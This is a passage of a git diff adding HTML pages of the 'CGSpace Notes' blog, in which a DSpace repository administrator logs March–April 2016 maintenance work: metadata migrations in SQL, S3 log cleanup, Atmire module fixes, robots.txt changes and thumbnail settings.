+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-03/">March, 2016</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2016-03-02T16:50:00+03:00">Wed Mar 02, 2016</time>
+ in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-03-02">2016-03-02</h2>
+<ul>
+<li>Looking at issues with author authorities on CGSpace</li>
+<li>For some reason we still have the <code>index-lucene-update</code> cron job active on CGSpace, but I&rsquo;m pretty sure we don&rsquo;t need it as of the latest few versions of Atmire&rsquo;s Listings and Reports module</li>
+<li>Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Java JDK 1.7 to match environment on CGSpace server</li>
+</ul>
+<h2 id="2016-03-07">2016-03-07</h2>
+<ul>
+<li>Troubleshooting the issues with the slew of commits for Atmire modules in <a href="https://github.com/ilri/DSpace/pull/182">#182</a></li>
+<li>Their changes on <code>5_x-dev</code> branch work, but it is messy as hell with merge commits and old branch base</li>
+<li>When I rebase their branch on the latest <code>5_x-prod</code> I get blank white pages</li>
+<li>I identified one commit that causes the issue and let them know</li>
+<li>Restart DSpace Test, as it seems to have crashed after Sisay tried to import some CSV or zip or something:</li>
+</ul>
+<pre tabindex="0"><code>Exception in thread &#34;Lucene Merge Thread #19&#34; org.apache.lucene.index.MergePolicy$MergeException: java.io.IOException: No space left on device
+</code></pre><h2 id="2016-03-08">2016-03-08</h2>
+<ul>
+<li>Add a few new filters to Atmire&rsquo;s Listings and Reports module (<a href="https://github.com/ilri/DSpace/issues/180">#180</a>)</li>
+<li>We had also wanted to add a few to the Content and Usage module but I have to ask the editors which ones they were</li>
+</ul>
+<h2 id="2016-03-10">2016-03-10</h2>
+<ul>
+<li>Disable the lucene cron job on CGSpace as it shouldn&rsquo;t be needed anymore</li>
+<li>Discuss ORCiD and duplicate authors on Yammer</li>
+<li>Request new documentation for Atmire CUA and L&amp;R modules, as ours are from 2013</li>
+<li>Walk Sisay through some data cleaning workflows in OpenRefine</li>
+<li>Start cleaning up the configuration for Atmire&rsquo;s CUA module (<a href="https://github.com/ilri/DSpace/issues/185">#184</a>)</li>
+<li>It is very messed up because some labels are incorrect, fields are missing, etc</li>
+</ul>
+<p><img src="/cgspace-notes/2016/03/cua-label-mixup.png" alt="Mixed up label in Atmire CUA"></p>
+<ul>
+<li>Update documentation for Atmire modules</li>
+</ul>
+<h2 id="2016-03-11">2016-03-11</h2>
+<ul>
+<li>As I was looking at the CUA config I realized our Discovery config is all messed up and confusing</li>
+<li>I&rsquo;ve opened an issue to track some of that work (<a href="https://github.com/ilri/DSpace/issues/186">#186</a>)</li>
+<li>I did some major cleanup work on Discovery and XMLUI stuff related to the <code>dc.type</code> indexes (<a href="https://github.com/ilri/DSpace/pull/187">#187</a>)</li>
+<li>We had been confusing <code>dc.type</code> (a Dublin Core value) with <code>dc.type.output</code> (a value we invented) for a few years and it had permeated all aspects of our data, indexes, item displays, etc.</li>
+<li>There is still some more work to be done to remove references to old <code>outputtype</code> and <code>output</code></li>
+</ul>
+<h2 id="2016-03-14">2016-03-14</h2>
+<ul>
+<li>Fix some items that had invalid dates (I noticed them in the log during a re-indexing)</li>
+<li>Reset <code>search.index.*</code> to the default, as it is only used by Lucene (deprecated by Discovery in DSpace 5.x): <a href="https://github.com/ilri/DSpace/pull/188">#188</a></li>
+<li>Make titles in Discovery and Browse by more consistent (singular, sentence case, etc) (<a href="https://github.com/ilri/DSpace/issues/186">#186</a>)</li>
+<li>Also four or so center-specific subject strings were missing for Discovery</li>
+</ul>
+<p><img src="/cgspace-notes/2016/03/missing-xmlui-string.png" alt="Missing XMLUI string"></p>
+<h2 id="2016-03-15">2016-03-15</h2>
+<ul>
+<li>Create simple theme for new AVCD community just for a unique Google Tracking ID (<a href="https://github.com/ilri/DSpace/pull/191">#191</a>)</li>
+</ul>
+<h2 id="2016-03-16">2016-03-16</h2>
+<ul>
+<li>Still having problems deploying Atmire&rsquo;s CUA updates and fixes from January!</li>
+<li>More discussion on the GitHub issue here: <a href="https://github.com/ilri/DSpace/pull/182">https://github.com/ilri/DSpace/pull/182</a></li>
+<li>Clean up Atmire CUA config (<a href="https://github.com/ilri/DSpace/pull/193">#193</a>)</li>
+<li>Help Sisay with some PostgreSQL queries to clean up the incorrect <code>dc.contributor.corporateauthor</code> field</li>
+<li>I noticed that we have some weird values in <code>dc.language</code>:</li>
+</ul>
+<pre tabindex="0"><code># select * from metadatavalue where metadata_field_id=37;
+ metadata_value_id | resource_id | metadata_field_id | text_value | text_lang | place | authority | confidence | resource_type_id
+-------------------+-------------+-------------------+------------+-----------+-------+-----------+------------+------------------
+           1942571 |       35342 |                37 | hi         |           |     1 |           |         -1 |                2
+           1942468 |       35345 |                37 | hi         |           |     1 |           |         -1 |                2
+           1942479 |       35337 |                37 | hi         |           |     1 |           |         -1 |                2
+           1942505 |       35336 |                37 | hi         |           |     1 |           |         -1 |                2
+           1942519 |       35338 |                37 | hi         |           |     1 |           |         -1 |                2
+           1942535 |       35340 |                37 | hi         |           |     1 |           |         -1 |                2
+           1942555 |       35341 |                37 | hi         |           |     1 |           |         -1 |                2
+           1942588 |       35343 |                37 | hi         |           |     1 |           |         -1 |                2
+           1942610 |       35346 |                37 | hi         |           |     1 |           |         -1 |                2
+           1942624 |       35347 |                37 | hi         |           |     1 |           |         -1 |                2
+           1942639 |       35339 |                37 | hi         |           |     1 |           |         -1 |                2
+</code></pre><ul>
+<li>It seems this <code>dc.language</code> field isn&rsquo;t really used, but we should delete these values</li>
+<li>Also, <code>dc.language.iso</code> has some weird values, like &ldquo;En&rdquo; and &ldquo;English&rdquo;</li>
+</ul>
+<h2 id="2016-03-17">2016-03-17</h2>
+<ul>
+<li>It turns out <code>hi</code> is the ISO 639 language code for Hindi, but these should be in <code>dc.language.iso</code> instead of <code>dc.language</code></li>
+<li>I fixed the eleven items with <code>hi</code> as well as some using the incorrect <code>vn</code> for Vietnamese</li>
+<li>Start discussing CG core with Abenet and Sisay</li>
+<li>Re-sync CGSpace database to DSpace Test for Atmire to do some tests about the problematic CUA patches</li>
+<li>The patches work fine with a clean database, so the error was caused by some mismatch in CUA versions and the database during my testing</li>
+</ul>
+<h2 id="2016-03-18">2016-03-18</h2>
+<ul>
+<li>Merge Atmire fixes into <code>5_x-prod</code></li>
+<li>Discuss thumbnails with Francesca from Bioversity</li>
+<li>Some of their items end up with thumbnails that have a big white border around them:</li>
+</ul>
+<p><img src="/cgspace-notes/2016/03/bioversity-thumbnail-bad.jpg" alt="Excessive whitespace in thumbnail"></p>
+<ul>
+<li>Turns out we can add <code>-trim</code> to the GraphicsMagick options to trim the whitespace</li>
+</ul>
+<p><img src="/cgspace-notes/2016/03/bioversity-thumbnail-good.jpg" alt="Trimmed thumbnail"></p>
+<ul>
+<li>Command used:</li>
+</ul>
+<pre tabindex="0"><code>$ gm convert -trim -quality 82 -thumbnail x300 -flatten Descriptor\ for\ Butia_EN-2015_2021.pdf\[0\] cover.jpg
+</code></pre><ul>
+<li>Also, it looks like adding <code>-sharpen 0x1.0</code> really improves the quality of the image for only a few KB</li>
+</ul>
+<h2 id="2016-03-21">2016-03-21</h2>
+<ul>
+<li>Fix 66 site errors in Google&rsquo;s webmaster tools</li>
+<li>I looked at a bunch of them and they were old URLs, weird things linked from non-existent items, etc, so I just marked them all as fixed</li>
+<li>We also have 1,300 &ldquo;soft 404&rdquo; errors for URLs like: <a href="https://cgspace.cgiar.org/handle/10568/440/browse?type=bioversity">https://cgspace.cgiar.org/handle/10568/440/browse?type=bioversity</a></li>
+<li>I&rsquo;ve marked them as fixed as well since the ones I tested were working fine</li>
+<li>This raises another question, as many of these pages are linked from Discovery search results and might create a duplicate content problem&hellip;</li>
+<li>Results pages like this give items that Google already knows from the sitemap: <a href="https://cgspace.cgiar.org/discover?filtertype=author&amp;filter_relational_operator=equals&amp;filter=Orth%2C+A">https://cgspace.cgiar.org/discover?filtertype=author&amp;filter_relational_operator=equals&amp;filter=Orth%2C+A</a>.</li>
+<li>There are some access denied errors on JSPUI links (of course! we forbid them!), but I&rsquo;m not sure why Google is trying to index them&hellip;</li>
+<li>For example:
+<ul>
+<li>This: <a href="https://cgspace.cgiar.org/jspui/bitstream/10568/809/1/main-page.pdf">https://cgspace.cgiar.org/jspui/bitstream/10568/809/1/main-page.pdf</a></li>
+<li>Linked from: <a href="https://cgspace.cgiar.org/jspui/handle/10568/809">https://cgspace.cgiar.org/jspui/handle/10568/809</a></li>
+</ul>
+</li>
+<li>I will mark these errors as resolved because they are returning HTTP 403 on purpose, for a long time!</li>
+<li>Google says the first time it saw this particular error was September 29, 2015&hellip; so maybe it accidentally saw it somehow&hellip;</li>
+<li>On a related note, we have 51,000 items indexed from the sitemap, but 500,000 items in the Google index, so we DEFINITELY have a problem with duplicate content</li>
+</ul>
+<p><img src="/cgspace-notes/2016/03/google-index.png" alt="CGSpace pages in Google index"></p>
+<ul>
+<li>Turns out this is a problem with DSpace&rsquo;s <code>robots.txt</code>, and there&rsquo;s a Jira ticket since December, 2015: <a href="https://jira.duraspace.org/browse/DS-2962">https://jira.duraspace.org/browse/DS-2962</a></li>
+<li>I am not sure if I want to apply it yet</li>
+<li>For now I&rsquo;ve just set a bunch of these dynamic pages to not appear in search results by using the URL Parameters tool in Webmaster Tools</li>
+</ul>
+<p><img src="/cgspace-notes/2016/03/url-parameters.png" alt="URL parameters cause millions of dynamic pages">
+<img src="/cgspace-notes/2016/03/url-parameters2.png" alt="Setting pages with the filter_0 param not to show in search results"></p>
+<ul>
+<li>Move AVCD collection to new community and update <code>move_collection.sh</code> script: <a href="https://gist.github.com/alanorth/392c4660e8b022d99dfa">https://gist.github.com/alanorth/392c4660e8b022d99dfa</a></li>
+<li>It seems Feedburner can do HTTPS now, so we might be able to update our feeds and simplify the nginx configs</li>
+<li>De-deploy CGSpace with latest <code>5_x-prod</code> branch</li>
+<li>Run updates on CGSpace and reboot server (new kernel, <code>4.5.0</code>)</li>
+<li>Deploy Let&rsquo;s Encrypt certificate for cgspace.cgiar.org, but still need to work it into the ansible playbooks</li>
+</ul>
+<h2 id="2016-03-22">2016-03-22</h2>
+<ul>
+<li>Merge robots.txt patch and disallow indexing of browse pages as our sitemap is consumed correctly (<a href="https://github.com/ilri/DSpace/issues/198">#198</a>)</li>
+</ul>
+<h2 id="2016-03-23">2016-03-23</h2>
+<ul>
+<li>Abenet is having problems saving group memberships, and she gets this error: <a href="https://gist.github.com/alanorth/87281c061c2de57b773e">https://gist.github.com/alanorth/87281c061c2de57b773e</a></li>
+</ul>
+<pre tabindex="0"><code>Can&#39;t find method org.dspace.app.xmlui.aspect.administrative.FlowGroupUtils.processSaveGroup(org.dspace.core.Context,number,string,[Ljava.lang.String;,[Ljava.lang.String;,org.apache.cocoon.environment.wrapper.RequestWrapper). (resource://aspects/Administrative/administrative.js#967)
+</code></pre><ul>
+<li>I can reproduce the same error on DSpace Test and on my Mac</li>
+<li>Looks to be an issue with the Atmire modules, I&rsquo;ve submitted a ticket to their tracker.</li>
+</ul>
+<h2 id="2016-03-24">2016-03-24</h2>
+<ul>
+<li>Atmire sent a patch for the group saving issue: <a href="https://github.com/ilri/DSpace/pull/201">https://github.com/ilri/DSpace/pull/201</a></li>
+<li>I tested it locally and it works, so I merged it to <code>5_x-prod</code> and will deploy on CGSpace this week</li>
+</ul>
+<h2 id="2016-03-25">2016-03-25</h2>
+<ul>
+<li>Having problems with Listings and Reports, seems to be caused by a rogue reference to <code>dc.type.output</code></li>
+<li>This is the error we get when we proceed to the second page of Listings and Reports: <a href="https://gist.github.com/alanorth/b2d7fb5b82f94898caaf">https://gist.github.com/alanorth/b2d7fb5b82f94898caaf</a></li>
+<li>Commenting out the line works, but I haven&rsquo;t figured out the proper syntax for referring to <code>dc.type.*</code></li>
+</ul>
+<h2 id="2016-03-28">2016-03-28</h2>
+<ul>
+<li>Look into enabling the embargo during item submission, see: <a href="https://wiki.lyrasis.org/display/DSDOC5x/Embargo#Embargo-SubmissionProcess">https://wiki.lyrasis.org/display/DSDOC5x/Embargo#Embargo-SubmissionProcess</a></li>
+<li>Seems we only want <code>AccessStep</code> because <code>UploadWithEmbargoStep</code> disables the ability to edit embargos at the item level</li>
+<li>This pull request enables the ability to set an item-level embargo during submission: <a href="https://github.com/ilri/DSpace/pull/203">https://github.com/ilri/DSpace/pull/203</a></li>
+<li>I figured out that the problem with Listings and Reports was because I disabled the <code>search.index.*</code> last week, and they are still used by JSPUI apparently</li>
+<li>This pull request re-enables them: <a href="https://github.com/ilri/DSpace/pull/202">https://github.com/ilri/DSpace/pull/202</a></li>
+<li>Re-deploy DSpace Test, run all system updates, and restart the server</li>
+<li>Looks like the Listings and Reports fix was NOT due to the search indexes (which are actually not used), and rather due to the filter configuration in the Listings and Reports config</li>
+<li>This pull request simply updates the config for the dc.type.output → dc.type change that was made last week: <a href="https://github.com/ilri/DSpace/pull/204">https://github.com/ilri/DSpace/pull/204</a></li>
+<li>Deploy robots.txt fix, embargo for item submissions, and listings and reports fix on CGSpace</li>
+</ul>
+<h2 id="2016-03-29">2016-03-29</h2>
+<ul>
+<li>Skype meeting with Peter and Addis team to discuss metadata changes for Dublin Core, CGcore, and CGSpace-specific fields</li>
+<li>We decided to proceed with some deletes first, then identify CGSpace-specific fields to clean/move to <code>cg.*</code>, and then worry about broader changes to DC</li>
+<li>Before we move or rename and fields we need to circulate a list of fields we intend to change to CCAFS, CWPF, etc who might be harvesting the fields</li>
+<li>After all of this we need to start implementing controlled vocabularies for fields, either with the Javascript lookup or like existing ILRI subjects</li>
+</ul>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2016-04/index.html b/docs/2016-04/index.html
new file mode 100644
index 000000000..267498961
--- /dev/null
+++ b/docs/2016-04/index.html
@@ -0,0 +1,549 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="April, 2016" />
+<meta property="og:description" content="2016-04-04
+
+Looking at log file use on CGSpace and notice that we need to work on our cron setup a bit
+We are backing up all logs in the log folder, including useless stuff like solr, cocoon, handle-plugin, etc
+After running DSpace for over five years I&rsquo;ve never needed to look in any other log file than dspace.log, leave alone one from last year!
+This will save us a few gigs of backup space we&rsquo;re paying for on S3
+Also, I noticed the checker log has some errors we should pay attention to:
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2016-04/" />
+<meta property="article:published_time" content="2016-04-04T11:06:00+03:00" />
+<meta property="article:modified_time" content="2018-03-09T22:10:33+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="April, 2016"/>
+<meta name="twitter:description" content="2016-04-04
+
+Looking at log file use on CGSpace and notice that we need to work on our cron setup a bit
+We are backing up all logs in the log folder, including useless stuff like solr, cocoon, handle-plugin, etc
+After running DSpace for over five years I&rsquo;ve never needed to look in any other log file than dspace.log, leave alone one from last year!
+This will save us a few gigs of backup space we&rsquo;re paying for on S3
+Also, I noticed the checker log has some errors we should pay attention to:
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "April, 2016",
+  "url": "https://alanorth.github.io/cgspace-notes/2016-04/",
+  "wordCount": "2006",
+  "datePublished": "2016-04-04T11:06:00+03:00",
+  "dateModified": "2018-03-09T22:10:33+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2016-04/">
+
+    <title>April, 2016 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-04/">April, 2016</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2016-04-04T11:06:00+03:00">Mon Apr 04, 2016</time>
+ in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-04-04">2016-04-04</h2>
+<ul>
+<li>Looking at log file use on CGSpace and notice that we need to work on our cron setup a bit</li>
+<li>We are backing up all logs in the log folder, including useless stuff like solr, cocoon, handle-plugin, etc</li>
+<li>After running DSpace for over five years I&rsquo;ve never needed to look in any other log file than dspace.log, leave alone one from last year!</li>
+<li>This will save us a few gigs of backup space we&rsquo;re paying for on S3</li>
+<li>Also, I noticed the <code>checker</code> log has some errors we should pay attention to:</li>
+</ul>
+<pre tabindex="0"><code>Run start time: 03/06/2016 04:00:22
+Error retrieving bitstream ID 71274 from asset store.
+java.io.FileNotFoundException: /home/cgspace.cgiar.org/assetstore/64/29/06/64290601546459645925328536011917633626 (Too many open files)
+        at java.io.FileInputStream.open(Native Method)
+        at java.io.FileInputStream.&lt;init&gt;(FileInputStream.java:146)
+        at edu.sdsc.grid.io.local.LocalFileInputStream.open(LocalFileInputStream.java:171)
+        at edu.sdsc.grid.io.GeneralFileInputStream.&lt;init&gt;(GeneralFileInputStream.java:145)
+        at edu.sdsc.grid.io.local.LocalFileInputStream.&lt;init&gt;(LocalFileInputStream.java:139)
+        at edu.sdsc.grid.io.FileFactory.newFileInputStream(FileFactory.java:630)
+        at org.dspace.storage.bitstore.BitstreamStorageManager.retrieve(BitstreamStorageManager.java:525)
+        at org.dspace.checker.BitstreamDAO.getBitstream(BitstreamDAO.java:60)
+        at org.dspace.checker.CheckerCommand.processBitstream(CheckerCommand.java:303)
+        at org.dspace.checker.CheckerCommand.checkBitstream(CheckerCommand.java:171)
+        at org.dspace.checker.CheckerCommand.process(CheckerCommand.java:120)
+        at org.dspace.app.checker.ChecksumChecker.main(ChecksumChecker.java:236)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:606)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:225)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:77)
+******************************************************
+</code></pre><ul>
+<li>So this would be the <code>tomcat7</code> Unix user, who seems to have a default limit of 1024 files in its shell</li>
+<li>For what it&rsquo;s worth, we have been setting the actual Tomcat 7 process&rsquo; limit to 16384 for a few years (in <code>/etc/default/tomcat7</code>)</li>
+<li>Looks like cron will read limits from <code>/etc/security/limits.*</code> so we can do something for the tomcat7 user there</li>
+<li>Submit pull request for Tomcat 7 limits in Ansible dspace role (<a href="https://github.com/ilri/rmg-ansible-public/pull/30">#30</a>)</li>
+</ul>
+<h2 id="2016-04-05">2016-04-05</h2>
+<ul>
+<li>Reduce Amazon S3 storage used for logs from 46 GB to 6GB by deleting a bunch of logs we don&rsquo;t need!</li>
+</ul>
+<pre tabindex="0"><code># s3cmd ls s3://cgspace.cgiar.org/log/ &gt; /tmp/s3-logs.txt
+# grep checker.log /tmp/s3-logs.txt | awk &#39;{print $4}&#39; | xargs s3cmd del
+# grep cocoon.log /tmp/s3-logs.txt | awk &#39;{print $4}&#39; | xargs s3cmd del
+# grep handle-plugin.log /tmp/s3-logs.txt | awk &#39;{print $4}&#39; | xargs s3cmd del
+# grep solr.log /tmp/s3-logs.txt | awk &#39;{print $4}&#39; | xargs s3cmd del
+</code></pre><ul>
+<li>Also, adjust the cron jobs for backups so they only backup <code>dspace.log</code> and some stats files (.dat)</li>
+<li>Try to do some metadata field migrations using the Atmire batch UI (<code>dc.Species</code> → <code>cg.species</code>) but it took several hours and even missed a few records</li>
+</ul>
+<h2 id="2016-04-06">2016-04-06</h2>
+<ul>
+<li>A better way to move metadata on this scale is via SQL, for example <code>dc.type.output</code> → <code>dc.type</code> (their IDs in the metadatafieldregistry are 66 and 109, respectively):</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# update metadatavalue set metadata_field_id=109 where metadata_field_id=66;
+UPDATE 40852
+</code></pre><ul>
+<li>After that an <code>index-discovery -bf</code> is required</li>
+<li>Start working on metadata migrations, add 25 or so new metadata fields to CGSpace</li>
+</ul>
+<h2 id="2016-04-07">2016-04-07</h2>
+<ul>
+<li>Write shell script to do the migration of fields: <a href="https://gist.github.com/alanorth/72a70aca856d76f24c127a6e67b3342b">https://gist.github.com/alanorth/72a70aca856d76f24c127a6e67b3342b</a></li>
+<li>Testing with a few fields it seems to work well:</li>
+</ul>
+<pre tabindex="0"><code>$ ./migrate-fields.sh
+UPDATE metadatavalue SET metadata_field_id=109 WHERE metadata_field_id=66
+UPDATE 40883
+UPDATE metadatavalue SET metadata_field_id=202 WHERE metadata_field_id=72
+UPDATE 21420
+UPDATE metadatavalue SET metadata_field_id=203 WHERE metadata_field_id=76
+UPDATE 51258
+</code></pre><h2 id="2016-04-08">2016-04-08</h2>
+<ul>
+<li>Discuss metadata renaming with Abenet, we decided it&rsquo;s better to start with the center-specific subjects like ILRI, CIFOR, CCAFS, IWMI, and CPWF</li>
+<li>I&rsquo;ve e-mailed CCAFS and CPWF people to ask them how much time it will take for them to update their systems to cope with this change</li>
+</ul>
+<h2 id="2016-04-10">2016-04-10</h2>
+<ul>
+<li>Looking at the DOI issue <a href="https://www.yammer.com/dspacedevelopers/#/Threads/show?threadId=678507860">reported by Leroy from CIAT a few weeks ago</a></li>
+<li>It seems the <code>dx.doi.org</code> URLs are much more proper in our repository!</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like &#39;http://dx.doi.org%&#39;;
+ count
+-------
+  5638
+(1 row)
+
+dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like &#39;http://doi.org%&#39;;
+ count
+-------
+     3
+</code></pre><ul>
+<li>I will manually edit the <code>dc.identifier.doi</code> in <a href="https://cgspace.cgiar.org/handle/10568/72509?show=full">10568/72509</a> and tweet the link, then check back in a week to see if the donut gets updated</li>
+</ul>
+<h2 id="2016-04-11">2016-04-11</h2>
+<ul>
+<li>The donut is already updated and shows the correct number now</li>
+<li>CCAFS people say it will only take them an hour to update their code for the metadata renames, so I proposed we&rsquo;d do it tentatively on Monday the 18th.</li>
+</ul>
+<h2 id="2016-04-12">2016-04-12</h2>
+<ul>
+<li>Looking at quality of WLE data (<code>cg.subject.iwmi</code>) in SQL:</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# select text_value, count(*) from metadatavalue where metadata_field_id=217 group by text_value order by count(*) desc;
+</code></pre><ul>
+<li>Listings and Reports is still not returning reliable data for <code>dc.type</code></li>
+<li>I think we need to ask Atmire, as their documentation isn&rsquo;t too clear on the format of the filter configs</li>
+<li>Alternatively, I want to see if I move all the data from <code>dc.type.output</code> to <code>dc.type</code> and then re-index, if it behaves better</li>
+<li>Looking at our <code>input-forms.xml</code> I see we have two sets of ILRI subjects, but one has a few extra subjects</li>
+<li>Remove one set of ILRI subjects and remove duplicate <code>VALUE CHAINS</code> from existing list (<a href="https://github.com/ilri/DSpace/pull/216">#216</a>)</li>
+<li>I decided to keep the set of subjects that had <code>FMD</code> and <code>RANGELANDS</code> added, as it appears to have been requested to have been added, and might be the newer list</li>
+<li>I found 226 blank metadatavalues:</li>
+</ul>
+<pre tabindex="0"><code>dspacetest# select * from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
+</code></pre><ul>
+<li>I think we should delete them and do a full re-index:</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# delete from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
+DELETE 226
+</code></pre><ul>
+<li>I deleted them on CGSpace but I&rsquo;ll wait to do the re-index as we&rsquo;re going to be doing one in a few days for the metadata changes anyways</li>
+<li>In other news, moving the <code>dc.type.output</code> to <code>dc.type</code> and re-indexing seems to have fixed the Listings and Reports issue from above</li>
+<li>Unfortunately this isn&rsquo;t a very good solution, because Listings and Reports config should allow us to filter on <code>dc.type.*</code> but the documentation isn&rsquo;t very clear and I couldn&rsquo;t reach Atmire today</li>
+<li>We want to do the <code>dc.type.output</code> move on CGSpace anyways, but we should wait as it might affect other external people!</li>
+</ul>
+<h2 id="2016-04-14">2016-04-14</h2>
+<ul>
+<li>Communicate with Macaroni Bros again about <code>dc.type</code></li>
+<li>Help Sisay with some rsync and Linux stuff</li>
+<li>Notify CIAT people of metadata changes (I had forgotten them last week)</li>
+</ul>
+<h2 id="2016-04-15">2016-04-15</h2>
+<ul>
+<li>DSpace Test had crashed, so I ran all system updates, rebooted, and re-deployed DSpace code</li>
+</ul>
+<h2 id="2016-04-18">2016-04-18</h2>
+<ul>
+<li>Talk to CIAT people about their portal again</li>
+<li>Start looking more at the fields we want to delete</li>
+<li>The following metadata fields have 0 items using them, so we can just remove them from the registry and any references in XMLUI, input forms, etc:
+<ul>
+<li>dc.description.abstractother</li>
+<li>dc.whatwasknown</li>
+<li>dc.whatisnew</li>
+<li>dc.description.nationalpartners</li>
+<li>dc.peerreviewprocess</li>
+<li>cg.species.animal</li>
+</ul>
+</li>
+<li>Deleted!</li>
